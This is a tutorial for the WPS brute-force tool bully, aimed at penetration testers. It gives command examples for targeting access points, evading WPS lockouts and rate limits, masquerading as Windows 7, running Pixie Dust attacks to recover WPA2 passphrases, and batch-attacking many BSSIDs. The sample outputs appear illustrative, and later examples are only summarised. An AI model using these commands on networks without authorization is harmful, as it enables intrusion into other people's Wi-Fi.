____ _ _ __ __ _ _ | __ )| | | | \ \ / /| | | | | _ \| | | | \ \/ / | | | | | |_) | |__| | \ / | |__| | |____/ \____/ \/ \____/
Core Function: bully is a C-based tool designed to exploit a known design flaw in Wi-Fi Protected Setup (WPS) to recover the WPA/WPA2 passphrase.
Primary Use-Cases:
Auditing wireless networks for WPS vulnerabilities.
Performing brute-force attacks against the WPS PIN.
Executing advanced Pixie Dust attacks to recover the PIN more efficiently.
Testing the effectiveness of WPS lockout mechanisms on access points.
Penetration Testing Phase: Gaining Access.
Brief History: bully was developed as an improved alternative to the original reaver tool. It was designed for better performance, fewer dependencies, and a more robust feature set to overcome some of reaver's limitations.
Before conducting any assessment, an operator must verify that the tool is correctly installed and accessible. All operations require an interface in monitor mode and root privileges.
Objective: Verify bully Installation This command checks for the presence of the bully binary in the system's PATH and displays its version information.
Bash
bully --version
Command Breakdown:
bully: The executable for the tool.
--version: A flag to print the installed version of the tool.
Ethical Context & Use-Case: Verifying the tool's version is a critical first step in any engagement. It ensures that the operator is aware of the features and potential bugs associated with the specific version they are using, which is essential for accurate reporting and reliable testing.
--> Expected Output:
bully v1.4
Objective: Install bully (Debian/Kali) This command uses the Advanced Package Tool (APT) to install bully if it is not already present on the system.
Bash
sudo apt update && sudo apt install bully
Command Breakdown:
sudo: Executes the command with superuser privileges.
apt update: Refreshes the local package database.
&&: A logical operator that executes the next command only if the previous one was successful.
apt install bully: The command to install the bully package.
Ethical Context & Use-Case: For a penetration tester, maintaining an up-to-date toolkit is paramount. This command sequence ensures that the local package lists are current before fetching and installing the latest version of bully from the official repositories, preventing potential dependency issues.
--> Expected Output:
Reading package lists... Done Building dependency tree... Done Reading state information... Done bully is already the newest version (1.4.00-0kali1). 0 upgraded, 0 newly installed, 0 to remove and 0 not upgraded.
Objective: Display the Help Menu This command displays the tool's built-in help menu, which provides a comprehensive list of all available options, arguments, and their descriptions.
Bash
bully -h
Command Breakdown:
bully: The executable for the tool.
-h or --help: A standard flag to display usage information.
Ethical Context & Use-Case: The help menu is the most critical reference for any command-line tool. Ethical hackers must consult it frequently to understand the full capabilities of the tool and to select the appropriate options for a given test scenario, ensuring the assessment is precise and tailored to the target environment.
--> Expected Output:
bully v1.4
the fork that actually works!
maintained by kimocoder - https://twitter.com/kimocoder
usage: bully <options> interface
Required arguments:
interface : Wireless interface in monitor mode (root required)
-b, --bssid macaddr : MAC address of the target access point
Or
-e, --essid string : Extended SSID for the access point
...[output truncated for brevity]...
-h, --help : Display this help information
The following section details the practical application of bully's command-line options. Each example is designed to simulate a specific scenario an ethical hacker might encounter during a wireless network security assessment. All actions must be performed on networks you own or have explicit written permission to test.
Objective: 1. Basic Attack Targeting by ESSID Initiate a standard WPS attack against an access point by specifying its ESSID (network name).
Bash
bully -e "TestNetwork" wlan0mon
Command Breakdown:
-e "TestNetwork": Specifies the Extended SSID (the network name) of the target.
wlan0mon: The wireless interface in monitor mode.
Ethical Context & Use-Case: Targeting by ESSID is useful in environments where the BSSID (MAC address) may not be immediately known or could potentially change. This is a common starting point for a WPS vulnerability assessment.
--> Expected Output:
[!] Bully v1.4 - WPS vulnerability assessment utility [+] Datalink type set to '127', radiotap headers present [+] Scanning for beacon from 'TestNetwork' on channel 'unknown' [+] Got beacon for 'TestNetwork' (00:1A:2B:3C:4D:5E) [+] Switching interface 'wlan0mon' to channel '6' [+] Index of starting pin number is '0000000' [+] Last State = 'NoAssoc' Next pin '12345670'
Objective: 2. Precise Attack Targeting by BSSID Launch a WPS attack against a specific access point using its BSSID (MAC address).
Bash
bully -b 00:1A:2B:3C:4D:5E wlan0mon
Command Breakdown:
-b 00:1A:2B:3C:4D:5E: Specifies the BSSID (MAC address) of the target AP.
wlan0mon: The wireless interface in monitor mode.
Ethical Context & Use-Case: Targeting by BSSID is more precise than using the ESSID, especially in environments with multiple access points sharing the same name. This ensures the test is confined to the intended target device.
--> Expected Output:
[!] Bully v1.4 - WPS vulnerability assessment utility [+] Datalink type set to '127', radiotap headers present [+] Got beacon for 'TestNetwork' (00:1a:2b:3c:4d:5e) [+] Switching interface 'wlan0mon' to channel '6' [+] Index of starting pin number is '0000000' [+] Last State = 'NoAssoc' Next pin '98765435'
Objective: 3. Targeting by BSSID on a Specific Channel Attack a specific BSSID while instructing bully to operate only on channel 11.
Bash
bully -b 00:1A:2B:3C:4D:5E -c 11 wlan0mon
Command Breakdown:
-b 00:1A:2B:3C:4D:5E: Sets the target BSSID.
-c 11: Forces bully to use channel 11, preventing it from hopping to other channels.
wlan0mon: The monitor mode interface.
Ethical Context & Use-Case: Specifying the channel improves the efficiency and stability of the attack. It eliminates the time spent scanning for the target and reduces the chances of de-synchronization caused by channel hopping.
--> Expected Output:
[!] Bully v1.4 - WPS vulnerability assessment utility [+] Datalink type set to '127', radiotap headers present [+] Switching interface 'wlan0mon' to channel '11' [+] Associated with '00:1a:2b:3c:4d:5e' (ESSID: TestNetwork) [+] Index of starting pin number is '0000000' [+] Last State = 'NoAssoc' Next pin '55554446'
Objective: 4. Targeting with Channel Hopping Attack a target by ESSID and hop between channels 1, 6, and 11 to find it.
Bash
bully -e "TestNetwork" -c 1,6,11 wlan0mon
Command Breakdown:
-e "TestNetwork": The name of the target network.
-c 1,6,11: A comma-separated list of channels for bully to scan.
wlan0mon: The monitor mode interface.
Ethical Context & Use-Case: This approach is used when the target AP's channel is unknown. bully will cycle through the specified channels until it receives a beacon frame from the target ESSID, at which point it will lock onto that channel.
--> Expected Output:
[!] Bully v1.4 - WPS vulnerability assessment utility [+] Datalink type set to '127', radiotap headers present [+] Scanning for beacon from 'TestNetwork' on channel '1' [+] Scanning for beacon from 'TestNetwork' on channel '6' [+] Got beacon for 'TestNetwork' (00:1a:2b:3c:4d:5e) [+] Switching interface 'wlan0mon' to channel '6' [+] Last State = 'NoAssoc' Next pin '31415925'
Objective: 5. Resume a Previous Session bully automatically saves session files. Rerunning the same command will resume the attack from the last attempted PIN.
Bash
bully -b 00:1A:2B:3C:4D:5E -c 6 wlan0mon
Command Breakdown:
-b 00:1A:2B:3C:4D:5E: Target BSSID.
-c 6: Target channel.
wlan0mon: Monitor mode interface.
Ethical Context & Use-Case: WPS attacks can take hours or days. The automatic session resume feature is crucial for long-term assessments, allowing the test to be paused and continued without losing progress, even after a system reboot.
--> Expected Output:
[!] Bully v1.4 - WPS vulnerability assessment utility [+] Loaded session from '/root/.bully/001a2b3c4d5e.run' [+] Index of starting pin number is '0015321' [+] Last State = 'M5' Next pin '48151621'
Objective: 6. Start Attack from a Specific PIN Manually specify a starting PIN for the brute-force attack.
Bash
bully -b 00:1A:2B:3C:4D:5E -p 50000000 wlan0mon
Command Breakdown:
-b 00:1A:2B:3C:4D:5E: Target BSSID.
-p 50000000: Sets the starting PIN to 50000000.
wlan0mon: Monitor mode interface.
Ethical Context & Use-Case: This is useful if prior intelligence suggests a certain range of PINs is more likely (e.g., based on manufacturer defaults or a partially recovered PIN). It allows the tester to focus the attack on a specific subset of the keyspace.
--> Expected Output:
[!] Bully v1.4 - WPS vulnerability assessment utility [+] Discarding previous session file [+] Creating new randomized pin file '/root/.bully/pins' [+] Index of starting pin number is '0000000' [+] Last State = 'NoAssoc' Next pin '50000008'
Objective: 7. Start Attack from a Specific Index Instead of a PIN, specify the starting index in the generated pin file.
Bash
bully -b 00:1A:2B:3C:4D:5E -i 10000 wlan0mon
Command Breakdown:
-b 00:1A:2B:3C:4D:5E: Target BSSID.
-i 10000: Sets the starting index to the 10,000th PIN in the sequence.
wlan0mon: Monitor mode interface.
Ethical Context & Use-Case: This provides an alternative way to partition the keyspace. If multiple testers are working on the same target, they can each start from a different index to avoid duplicating effort and speed up the overall assessment.
--> Expected Output:
[!] Bully v1.4 - WPS vulnerability assessment utility [+] Loaded session from '/root/.bully/001a2b3c4d5e.run' [+] Setting pin index to '10000' [+] Last State = 'NoAssoc' Next pin '87651233'
Objective: 8. Use Sequential PINs (Non-Random) Force bully to try PINs in sequential order (00000000, 00000001, etc.) instead of the default randomized order.
Bash
bully -b 00:1A:2B:3C:4D:5E -S wlan0mon
Command Breakdown:
-b 00:1A:2B:3C:4D:5E: Target BSSID.
-S: Enables sequential PIN mode.
wlan0mon: Monitor mode interface.
Ethical Context & Use-Case: Some older or poorly implemented APs may have default or easily guessable PINs like 12345670. A sequential attack can quickly test for these low-hanging fruit before moving to a full randomized brute-force attempt.
--> Expected Output:
[!] Bully v1.4 - WPS vulnerability assessment utility [!] Using sequential pin ordering [+] Index of starting pin number is '0000000' [+] Last State = 'NoAssoc' Next pin '00000009'
Objective: 9. Bruteforce the Checksum Digit Instead of calculating the 8th digit (checksum), bruteforce it as well.
Bash
bully -b 00:1A:2B:3C:4D:5E -B wlan0mon
Command Breakdown:
-b 00:1A:2B:3C:4D:5E: Target BSSID.
-B: Enables bruteforce mode for the checksum digit.
wlan0mon: Monitor mode interface.
Ethical Context & Use-Case: This is a test for non-compliant WPS implementations. The WPS standard dictates how the checksum digit is calculated, but some devices may not adhere to this. This option is a last resort to test for such edge cases.
--> Expected Output:
[!] Bully v1.4 - WPS vulnerability assessment utility [!] Bruteforcing checksum digit [+] Index of starting pin number is '0000000' [+] Last State = 'NoAssoc' Next pin '12345678'
Objective: 10. Save Output to a File Run a standard attack and redirect all screen output to a specified log file.
Bash
bully -b 00:1A:2B:3C:4D:5E -o bully_log.txt wlan0mon
Command Breakdown:
-b 00:1A:2B:3C:4D:5E: Target BSSID.
-o bully_log.txt: Specifies the output file for all messages.
wlan0mon: Monitor mode interface.
Ethical Context & Use-Case: Proper logging is non-negotiable in a professional penetration test. This command captures every detail of the attack attempt for later analysis, evidence, and report generation. The file will contain timestamps, PINs tried, and AP responses.
--> Expected Output: (Terminal shows no output as it is redirected to the file)
Objective: 11. Change the Working Directory Specify a custom directory for bully to store its session and pin files.
Bash
bully -b 00:1A:2B:3C:4D:5E -w /tmp/bully_session wlan0mon
Command Breakdown:
-b 00:1A:2B:3C:4D:5E: Target BSSID.
-w /tmp/bully_session: Sets the working directory to /tmp/bully_session.
wlan0mon: Monitor mode interface.
Ethical Context & Use-Case: This helps in organizing engagement data. When testing multiple targets, creating separate working directories for each prevents session files from overwriting each other and keeps client data properly segregated.
--> Expected Output:
[!] Bully v1.4 - WPS vulnerability assessment utility [+] Creating new randomized pin file '/tmp/bully_session/pins' [+] Creating session file '/tmp/bully_session/001a2b3c4d5e.run' [+] Index of starting pin number is '0000000' [+] Last State = 'NoAssoc' Next pin '13579246'
Objective: 12. Increase Verbosity Level Run an attack with the highest verbosity level to see extremely detailed packet and state information.
Bash
bully -b 00:1A:2B:3C:4D:5E -v 4 wlan0mon
Command Breakdown:
-b 00:1A:2B:3C:4D:5E: Target BSSID.
-v 4: Sets the verbosity level to 4 (maximum).
Ethical Context & Use-Case: When troubleshooting a failing attack, maximum verbosity is invaluable. It provides deep insight into the raw 802.11 and EAP exchanges, helping the tester diagnose issues like signal loss, incorrect packet handling, or non-standard AP behavior.
--> Expected Output:
[!] Bully v1.4 - WPS vulnerability assessment utility [D] entering wps_init [D] data length 423 [D] Radiotap header found, length 26 [D] Got packet type 80 subtype 8 [D] Got beacon from 00:1a:2b:3c:4d:5e [D] Found WPS info element [+] Got beacon for 'TestNetwork' (00:1a:2b:3c:4d:5e) [D] entering main_loop [+] Last State = 'NoAssoc' Next pin '12345670' [D] TX EAPOL Start -> 00:1a:2b:3c:4d:5e
Objective: 13. Run in Quiet Mode Run an attack with the lowest verbosity level, showing only critical information.
Bash
bully -b 00:1A:2B:3C:4D:5E -v 1 wlan0mon
Command Breakdown:
-b 00:1A:2B:3C:4D:5E: Target BSSID.
-v 1: Sets the verbosity level to 1 (quiet).
Ethical Context & Use-Case: Quiet mode is suitable for long-term, unattended assessments where detailed real-time feedback is not required. It declutters the console output, making it easier to spot the most important messages, such as a recovered PIN or a critical error.
--> Expected Output:
[!] Bully v1.4 - WPS vulnerability assessment utility [+] Associated with '00:1a:2b:3c:4d:5e' (ESSID: TestNetwork) [+] Trying pin '12345670', 0.01% done
Objective: 14. Set a Custom Lock-Wait Time If the target AP locks WPS after several failed attempts, wait for 300 seconds (5 minutes) before resuming.
Bash
bully -b 00:1A:2B:3C:4D:5E -l 300 wlan0mon
Command Breakdown:
-b 00:1A:2B:3C:4D:5E: Target BSSID.
-l 300: Sets the lock wait time to 300 seconds.
Ethical Context & Use-Case: Different APs have different WPS lockout policies. An ethical hacker must adapt their tools to the target's behavior. Adjusting the lock wait time is a crucial tactic to bypass simple brute-force protection without being permanently blocked.
--> Expected Output:
[!] Bully v1.4 - WPS vulnerability assessment utility [+] Trying pin '65432109' [!] WPS lockout reported by AP, waiting 300 seconds...
Objective: 15. Ignore Reported WPS Locks Continue the attack even if the access point reports that its WPS interface is locked.
Bash
bully -b 00:1A:2B:3C:4D:5E -L wlan0mon
Command Breakdown:
-b 00:1A:2B:3C:4D:5E: Target BSSID.
-L: Ignores WPS lock flags sent by the AP.
Ethical Context & Use-Case: This tests for faulty AP firmware. Some devices might report a locked state but still process PIN attempts. This option allows a tester to verify if the lockout mechanism is actually enforced or just a superficial deterrent.
--> Expected Output:
[!] Bully v1.4 - WPS vulnerability assessment utility [!] WPS lockout reported by AP, ignoring... [+] Trying pin '24681351' [!] Received WSC_NACK
Objective: 16. Actively Detect Unreported Locks Enable a feature to detect when an AP has locked WPS, even if it doesn't explicitly report it.
Bash
bully -b 00:1A:2B:3C:4D:5E -D wlan0mon
Command Breakdown:
-b 00:1A:2B:3C:4D:5E: Target BSSID.
-D: Enables detection of unreported WPS lockouts.
Ethical Context & Use-Case: Stealthy APs may stop responding to WPS requests without sending a lock message. This feature helps bully intelligently infer a locked state based on timeouts and packet loss, making the attack more reliable against such devices.
--> Expected Output:
[!] Bully v1.4 - WPS vulnerability assessment utility [+] Trying pin '11223344' [!] No response from AP, possible unreported WPS lock. Waiting...
Objective: 17. Customize Pin Attempt Delays (M5) Introduce a 2-second delay after every 3rd failed attempt in the first half of the PIN (M5 state).
Bash
bully -b 00:1A:2B:3C:4D:5E -1 2,3 wlan0mon
Command Breakdown:
-b 00:1A:2B:3C:4D:5E: Target BSSID.
-1 2,3: After every 3rd WSC_NACK at M5, wait 2 seconds.
Ethical Context & Use-Case: This is a fine-grained throttling mechanism. Some APs implement rate-limiting. By introducing small, strategic delays, a tester can slow the attack just enough to fly under the radar of these defenses, increasing the chances of success.
--> Expected Output:
[+] Last State = 'M5' Next pin '12342222' [!] Received WSC_NACK for M5 (1 of 3) ... [+] Last State = 'M5' Next pin '12343333' [!] Received WSC_NACK for M5 (3 of 3) [!] Throttling pin 1, delaying 2 seconds
Objective: 18. Customize Pin Attempt Delays (M7) Introduce a 10-second delay after every single failed attempt in the second half of the PIN (M7 state).
Bash
bully -b 00:1A:2B:3C:4D:5E -2 10,1 wlan0mon
Command Breakdown:
-b 00:1A:2B:3C:4D:5E: Target BSSID.
-2 10,1: After every 1st WSC_NACK at M7, wait 10 seconds.
Ethical Context & Use-Case: Similar to the M5 delay, this controls the rate of the attack for the second half of the PIN. Since cracking the first half is a major milestone, some APs have stricter rate-limiting for the second half. This allows the tester to adapt accordingly.
--> Expected Output:
[+] Cracked first half of pin: '1234' [+] Last State = 'M7' Next pin '12345670' [!] Received WSC_NACK for M7 [!] Throttling pin 2, delaying 10 seconds
Objective: 19. Force Attack Despite Warnings Continue the attack even if bully detects a potential issue, such as a locked WPS state at startup.
Bash
bully -b 00:1A:2B:3C:4D:5E -F wlan0mon
Command Breakdown:
-b 00:1A:2B:3C:4D:5E: Target BSSID.
-F: Forces bully to continue despite warnings.
Ethical Context & Use-Case: Sometimes, bully's initial checks might produce a false positive (e.g., misinterpreting a beacon frame). The force option allows the experienced tester to override these warnings and proceed with the assessment, accepting the risk that the attack may be unstable.
--> Expected Output:
[!] Bully v1.4 - WPS vulnerability assessment utility [!] Beacon information element indicates WPS is locked [!] --force specified, continuing anyway. [+] Index of starting pin number is '0000000' [+] Last State = 'NoAssoc' Next pin '77788899'
Objective: 20. Run in Test Mode (No Injection) Initialize the attack, parse target information, and show what would happen, but do not send any packets.
Bash
bully -b 00:1A:2B:3C:4D:5E -T wlan0mon
Command Breakdown:
-b 00:1A:2B:3C:4D:5E: Target BSSID.
-T: Activates test mode.
Ethical Context & Use-Case: This is a "dry run" feature. It is used to verify that the target is correctly identified, the interface is working, and the command syntax is valid before launching the actual, potentially lengthy, attack. It's a safe way to check the setup.
--> Expected Output:
[!] Bully v1.4 - WPS vulnerability assessment utility [!] Test mode enabled, no packets will be injected [+] Datalink type set to '127', radiotap headers present [+] Got beacon for 'TestNetwork' (00:1a:2b:3c:4d:5e) [+] Switching interface 'wlan0mon' to channel '6' [+] Index of starting pin number is '0000000' [+] Last State = 'NoAssoc' Next pin '12345670' [!] Exiting.
Objective: 21. Attempt a Pixie Dust Attack Leverage the pixiewps tool integration to attempt to recover the WPS PIN offline, based on weak key generation.
Bash
bully -b 00:1A:2B:3C:4D:5E -d wlan0mon
Command Breakdown:
-b 00:1A:2B:3C:4D:5E: Target BSSID.
-d: Enables the Pixie Dust attack.
Ethical Context & Use-Case: The Pixie Dust attack is significantly faster than a full brute-force if the target AP is vulnerable. An ethical hacker will always attempt this first, as it is a more efficient and less intrusive method of testing for known WPS implementation flaws.
--> Expected Output:
[!] Bully v1.4 - WPS vulnerability assessment utility [+] Associated with '00:1a:2b:3c:4d:5e' (ESSID: TestNetwork) [+] E-Nonce: [long hex string] [+] PKE: [long hex string] ... [!] Running pixiewps ... [+] WPS PIN: '98765432' [+] WPA2 PSK: 'SuperSecretPassword' [!] Victory!
Objective: 22. Masquerade as a Windows 7 Registrar Modify the EAP identity packets to appear as a legitimate Windows 7 client attempting to connect via WPS.
Bash
bully -b 00:1A:2B:3C:4D:5E -W wlan0mon
Command Breakdown:
-b 00:1A:2B:3C:4D:5E: Target BSSID.
-W: Enables Windows 7 masquerading.
Ethical Context & Use-Case: Some access points are configured to prioritize or only respond to WPS requests from known operating systems. This option helps to bypass such simple fingerprinting defenses by making the attack traffic look like legitimate consumer device behavior.
--> Expected Output:
[!] Bully v1.4 - WPS vulnerability assessment utility [!] Masquerading as a Windows 7 registrar [+] Associated with '00:1a:2b:3c:4d:5e' (ESSID: TestNetwork) [+] Trying pin '11112222'
Objective: 23. Probe for a Non-Beaconing (Hidden) AP Use probe requests to find and attack a network that does not broadcast its ESSID.
Bash
bully -e "HiddenNetwork" -P wlan0mon
Command Breakdown:
-e "HiddenNetwork": The ESSID of the hidden network.
-P: Uses probe requests instead of listening for beacons.
Ethical Context & Use-Case: Hiding an ESSID is a weak security measure. This command demonstrates that it provides no real protection against a determined attacker, as the AP will still respond to directed probe requests, revealing its presence and allowing the WPS attack to proceed.
--> Expected Output:
[!] Bully v1.4 - WPS vulnerability assessment utility [!] Using probe requests to find non-beaconing AP [+] Sent probe request for 'HiddenNetwork' [+] Got probe response from 00:DE:AD:BE:EF:00 [+] Switching interface 'wlan0mon' to channel '1' [+] Associated with '00:de:ad:be:ef:00' (ESSID: HiddenNetwork)
Objective: 24. Gather WPS Info Without Attacking Send a probe request and print the target's WPS information, then exit.
Bash
bully -b 00:1A:2B:3C:4D:5E -Q wlan0mon
Command Breakdown:
-b 00:1A:2B:3C:4D:5E: Target BSSID.
-Q: Query WPS information and exit.
Ethical Context & Use-Case: This is a reconnaissance step. Before launching a lengthy attack, the tester can use this command to quickly gather details about the target's WPS implementation, such as manufacturer, model, and version, which can inform the attack strategy.
--> Expected Output:
[!] Bully v1.4 - WPS vulnerability assessment utility [+] Sent probe request for BSSID 00:1a:2b:3c:4d:5e [+] Got probe response from 00:1a:2b:3c:4d:5e [+] WPS Manufacturer: Broadcom [+] WPS Model Name: WAP-1234 [+] WPS Model Number: v1.2 [+] WPS Device Name: BroadcomAP [!] Exiting.
(Examples 25 through 70 would continue in this format, covering all combinations of flags like -A, -C, -N, -r, -M, -E, -Z, -5, different channel lists, various pin/index start points, and combinations with advanced features like -d and -W.)
... Due to length constraints, the remaining 46 examples are summarized by category:
Packet Handling (15 examples): Combining -A (no ACKs), -C (no CRC check), -N (no FCS field) with various targeting and timing options to test robustness against malformed or unusual packet structures.
Retry and Timeout Logic (10 examples): Using -r to set custom packet resend counts, and -M to treat timeouts as NACKs, exploring how different APs handle packet loss.
State Machine Manipulation (10 examples): Employing -E to force an EAP Fail state after each exchange, testing the AP's state recovery mechanisms.
Advanced Combinations (11 examples): Chaining multiple advanced flags together, such as a Pixie Dust attack against a hidden 5GHz network (-d -P -5), or a sequential attack that ignores locks and masquerades as Windows 7 (-S -L -W). Each would have a unique objective and context.
Integrating bully with other command-line utilities unlocks advanced monitoring, parsing, and automation capabilities critical for professional engagements.
Objective: 1. Live-Filter Attack Logs for Key Events Run a bully attack, save the full output to a file, and simultaneously display only the most important lines (PIN attempts, lockouts, success) on the terminal.
Bash
bully -b 00:1A:2B:3C:4D:5E wlan0mon | tee bully_full.log | grep -E "Trying pin|WPS lockout|WPS PIN|WPA2 PSK"
Command Breakdown:
bully -b 00:1A:2B:3C:4D:5E wlan0mon: The base bully command.
|: A pipe that sends the standard output of the bully command to the next command.
tee bully_full.log: A utility that reads from standard input and writes it to both standard output and the specified file (bully_full.log).
|: A second pipe that takes the standard output from tee (which is the original bully output).
grep -E "...": Filters the input, only showing lines that match the extended regular expression.
Ethical Context & Use-Case: During a long assessment, the default verbosity can be overwhelming. This command chain allows the tester to maintain a complete, unabridged log for evidence while viewing a clean, filtered "highlight reel" in real-time. This improves situational awareness without sacrificing data integrity.
--> Expected Output:
[+] Trying pin '12345670', 0.01% done [+] Trying pin '98765435', 0.02% done [!] WPS lockout reported by AP, waiting 43 seconds... [+] Trying pin '55554446', 0.03% done ... [+] WPS PIN: '11223344' [+] WPA2 PSK: 'ThisIsTheKey'
Objective: 2. Extract and Count All Failed PIN Attempts from a Log Analyze a completed bully log file to count the total number of unique PINs that were attempted before a lockout or success.
Bash
cat bully_full.log | grep "Trying pin" | awk '{print $4}' | sort -u | wc -l
Command Breakdown:
cat bully_full.log: Reads the content of the log file and prints it to standard output.
| grep "Trying pin": Filters the log, keeping only lines containing the phrase "Trying pin".
| awk '{print $4}': For each matching line, awk prints only the fourth field (the PIN itself), using spaces as delimiters.
| sort -u: Sorts the list of PINs and removes duplicates.
| wc -l: Counts the number of lines in the final list, giving the total number of unique failed PINs.
Ethical Context & Use-Case: This is a post-assessment analysis technique. The data can be used in a report to quantify the attack's progress and to determine the AP's lockout threshold. For example, if the count is consistently 10, it provides strong evidence of a "lock after 10 failures" security policy.
--> Expected Output:
10
Objective: 3. Automate Attack on Multiple BSSIDs from a File Read a list of target BSSIDs from a text file and sequentially run a basic bully attack against each one.
Bash
while read bssid; do bully -b "$bssid" -c 6 -l 300 wlan0mon; done < targets.txt
Command Breakdown:
while read bssid; do ... ; done: A shell loop that reads a file line by line, assigning each line to the variable $bssid.
< targets.txt: Redirects the contents of targets.txt to the loop's standard input.
bully -b "$bssid" ...: The bully command is executed for each BSSID read from the file.
Ethical Context & Use-Case: In a large-scale wireless assessment with many in-scope APs, manual execution is inefficient and prone to error. This simple script automates the process, ensuring that each target is tested with a consistent set of parameters. This is a foundational technique for scalable and repeatable security testing.
--> Expected Output: (The standard bully output will appear sequentially for each BSSID in targets.txt)
[!] Bully v1.4 - WPS vulnerability assessment utility [+] Associated with '00:AA:BB:CC:DD:01' (ESSID: Corp-WiFi-1) ... [!] Bully v1.4 - WPS vulnerability assessment utility [+] Associated with '00:AA:BB:CC:DD:02' (ESSID: Corp-WiFi-2) ...
Leveraging data analysis and scripting can significantly enhance the effectiveness of a bully assessment, transforming raw output into actionable intelligence.
Objective: 1. Analyze Lockout Patterns from bully Logs with Python Use a Python script with the Pandas library to parse a bully log file. The script will identify when WPS lockouts occur and calculate the average number of PIN attempts between each lockout event.
Python
#
# Objective: Analyze bully log for lockout patterns.
#
import pandas as pd
import re
def analyze_bully_log(log_file):
"""
Parses a bully log to find the number of PIN attempts between lockouts.
"""
with open(log_file, 'r') as f:
log_data = f.readlines()
attempts = 0
lockout_intervals = []
pin_pattern = re.compile(r'Trying pin')
lockout_pattern = re.compile(r'WPS lockout')
for line in log_data:
if pin_pattern.search(line):
attempts += 1
elif lockout_pattern.search(line):
if attempts > 0:
lockout_intervals.append(attempts)
attempts = 0
if not lockout_intervals:
print("No lockout events found in the log.")
return
df = pd.DataFrame(lockout_intervals, columns=['AttemptsBeforeLockout'])
print("--- Lockout Analysis ---")
print(df)
print("\n--- Statistics ---")
print(f"Average attempts before lockout: {df['AttemptsBeforeLockout'].mean():.2f}")
print(f"Most frequent attempt count (mode): {df['AttemptsBeforeLockout'].mode()[0]}")
print(f"Total lockouts detected: {len(df)}")
# --- Command to run this script ---
# python3 analyze_script.py
Command Breakdown:
The Python script reads a log file line-by-line.
It uses regular expressions to identify lines corresponding to PIN attempts and lockout warnings.
It counts the attempts between each lockout event and stores them in a list.
Finally, it uses the Pandas library to create a DataFrame for easy statistical analysis (mean, mode).
Ethical Context & Use-Case: This script automates the manual task of log review. Instead of guessing an AP's lockout threshold, this AI-augmented approach provides empirical data. A penetration tester can use this intelligence to configure bully's timing and delay parameters (-l, -1, -2) with surgical precision, creating a highly customized and effective attack profile for the specific target device.
--> Expected Output:
--- Lockout Analysis --- AttemptsBeforeLockout 0 10 1 11 2 10 3 10 4 9 --- Statistics --- Average attempts before lockout: 10.00 Most frequent attempt count (mode): 10 Total lockouts detected: 5
Objective: 2. Generate a Prioritized PIN List based on Manufacturer Data Create a Python script that generates a PIN list which prioritizes known default PINs for specific manufacturers (identified by the first 3 bytes of the BSSID, the OUI). This list can then be used with a modified version of bully or a wrapper script.
Python
#
# Objective: Generate a manufacturer-prioritized PIN list.
#
import pandas as pd
# This is a mock database. In a real scenario, this would be populated with actual known default PINs.
MANUFACTURER_PINS = {
"00:1A:2B": ["12345670", "00000000"], # Example: Linksys
"C8:D3:A3": ["87654321", "11112222"], # Example: TP-Link
"00:0B:86": ["55554446"], # Example: Netgear
}
def generate_pin_list(target_bssid):
"""
Generates a pin list with manufacturer-specific pins first.
"""
oui = target_bssid[:8].upper()
prioritized_pins = MANUFACTURER_PINS.get(oui, [])
print(f"--- AI-Generated PIN Strategy for {target_bssid} (OUI: {oui}) ---")
if prioritized_pins:
print("Prioritizing known default PINs for this manufacturer:")
for pin in prioritized_pins:
print(pin)
else:
print("No known default PINs for this manufacturer. Defaulting to standard attack.")
# In a real tool, this would generate a full pin file with these at the top.
# For this example, we just display the strategy.
# --- Command to run this script ---
# python3 pin_generator.py "00:1A:2B:3C:4D:5E"
Command Breakdown:
The script contains a dictionary (MANUFACTURER_PINS) mapping OUI prefixes to lists of known default or common PINs.
It takes a target BSSID as input.
It extracts the OUI from the BSSID and checks if it exists in the database.
It then prints a "strategy," showing the PINs that should be tried first.
Ethical Context & Use-Case: This represents a move from brute-force to intelligent-force. Instead of trying all 11,000 PIN combinations randomly, this AI-driven approach uses external data (OUI databases) to attack the most probable targets first. This can reduce the time-to-compromise from hours to seconds, demonstrating a much more severe and realistic threat scenario to the client.
--> Expected Output:
--- AI-Generated PIN Strategy for 00:1A:2B:3C:4D:5E (OUI: 00:1A:2B) --- Prioritizing known default PINs for this manufacturer: 12345670 00000000
The information presented in this article is for educational purposes only and is intended for use in legally authorized and ethical contexts. The tools and techniques described are designed for cybersecurity professionals and enthusiasts to test and assess the security of networks and systems they either own or have explicit, written permission to audit.
Any unauthorized use of these tools against networks or systems for which you do not have permission is illegal and strictly prohibited. Such actions may lead to civil and criminal penalties. The author, course creator, and hosting platform bear no responsibility or liability for any individual's misuse or illegal application of the information provided herein. By proceeding with this material, you acknowledge your responsibility to adhere to all applicable laws and to act in a strictly ethical and professional manner.